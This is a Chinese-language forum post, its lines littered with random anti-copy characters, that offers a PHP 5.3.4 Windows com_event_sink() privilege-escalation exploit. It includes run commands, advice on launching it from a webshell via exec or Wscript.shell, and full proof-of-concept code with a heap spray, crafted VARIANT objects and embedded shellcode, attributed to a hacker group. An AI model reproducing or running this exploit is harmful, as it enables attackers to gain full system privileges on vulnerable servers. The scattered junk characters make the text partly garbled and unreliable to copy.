|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中7 r% u4 F" [2 b6 J q2 @9 {
: }5 W% C% {& k1 m7 `
测试方法如下:cmd /c x:\php\php.exe x:\test.php+ K5 l3 x; j% t/ ]" Q5 c# S
0 W# Z! r# T9 `
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php9 P8 [8 V# M ~
这里是两个测试的截图:- x% A% W! l& r
3 t0 b5 \, w. s0 o7 T" P
) ]+ T* Q9 M7 y
' c' L& p# A8 a3 c% N6 O4 R
" _' q8 I& M/ d( x) k& D
3 Z$ g, N9 _) C" F成功利用此漏洞的攻击者将获得系统的最高权限: B0 T& R9 y2 i8 _2 k9 _
4 r5 A$ S, ~% _. q- S' p' S+ q4 G3 p, A/ S8 S6 {% G4 R' M" Z* C
( P# l' M6 G6 w0 M
% A6 k9 K2 R) `2 X( i
3 y# L6 k3 T; V6 y3 P关于漏洞分析稍后附上。一下是PoC代码:
, M2 z% L5 t: r7 J/ g* o9 ]( {) x$ t0 y# b# A8 D
<?php0 k! d0 H" m9 h7 T) [6 w3 E. z
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
5 r$ d$ M4 Y8 y- t7 c//$eip ="\x44\x43\x42\x41";
7 Y5 `; y" O. T" F/ l4 w$eip= "\x4b\xe8\x57\x78";% \0 u/ H2 E: a- A8 j
$eax ="\x80\x01\x8d\x04";7 a2 b- ~+ i& R3 N; y/ g& j2 o* ~
$deodrant="";; \# N2 d9 e3 A& U. b
$axespray = str_repeat($eip.$eax,0x80);
4 h- K v3 r$ }% N2 j$ @3 B3 A//048d0190
5 C' K8 K O6 y4 t9 necho strlen($axespray);
1 q9 ]! E: Y0 z9 P$ @! Zecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
) p& N4 g3 \' f, b2 Oecho "Silic Group Hacker Army - BlackBap.Org";
1 @+ y9 A( [3 Y: e6 d/ C' @3 j//19200 ==4B32 4b00+ ^) o6 d9 X x' U, w; Y
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}' P! M7 Y: G4 _9 M9 ?6 ]9 c
$terminate = "T";' b; @" I+ }: e8 B
$u[] =$deodrant; o( L! m$ `, v" \; }
$r[] =$deodrant.$terminate;
5 y) X$ @8 z& @$a[] =$deodrant.$terminate;) r3 |' L/ h j! Z
$s[] =$deodrant.$terminate;$ @* ]9 `' `& ~7 t! K! u
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的5 F9 ~7 @7 ~/ k- q4 Z# j. L
$vVar = new VARIANT(0x048d0000+180);2 f% L! u- d' A k
//弹窗代码(Shellcode)
# J' o% T2 m% F C/ _& p$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";' w. i. E7 \$ \4 M: l/ X5 V
$var2 = new VARIANT(0x41414242);" @/ H/ \8 O& t! U4 C
com_event_sink($vVar,$var2,$buffer);! X( H) s1 u% X! K
?>
" [/ V) `0 j3 F7 J0 m |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|